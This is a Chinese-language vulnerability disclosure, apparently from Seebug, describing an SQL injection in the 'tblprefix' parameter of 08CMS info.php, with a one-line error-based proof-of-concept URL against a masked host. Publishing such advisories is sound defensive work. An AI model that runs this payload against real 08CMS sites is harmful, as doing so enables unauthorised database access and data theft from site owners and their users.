08CMS info.php 参数tblprefix SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

###0x01影响范围 08cms广泛应用于汽车、房产系统。厂商: ``` http://www.08cms.com/ 08cms ``` 谷歌关键字用户量很大: ![](https://images.seebug.org/contribute/5a3b5f82-fa65-4220-837b-ed20e07ac3f8) ###0x02漏洞描述 08cms在文件info.php处对参数tblprefix过滤不严格,导致出现SQL注入漏洞。远程攻击者可以构造SQL语句,执行恶意操作。 ###0x03漏洞详情 SQL注入点: ``` /info.php?fid=1&tblprefix=cms_msession tblprefix存在注入 ``` ![](https://images.seebug.org/contribute/9b60c175-e6e9-479f-9b0b-81bbf96b4b97) ###0x04漏洞证明 可以构造如下poc进行利用: ``` http://***.com/info.php?fid=1&tblprefix=cms_msession where (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- - ``` ![](https://images.seebug.org/contribute/bd500065-3bd6-4ab8-ac88-457b15adbce8) ###0x05修复方案 过滤。

0%
暂无可用Exp或PoC
当前有0条受影响产品信息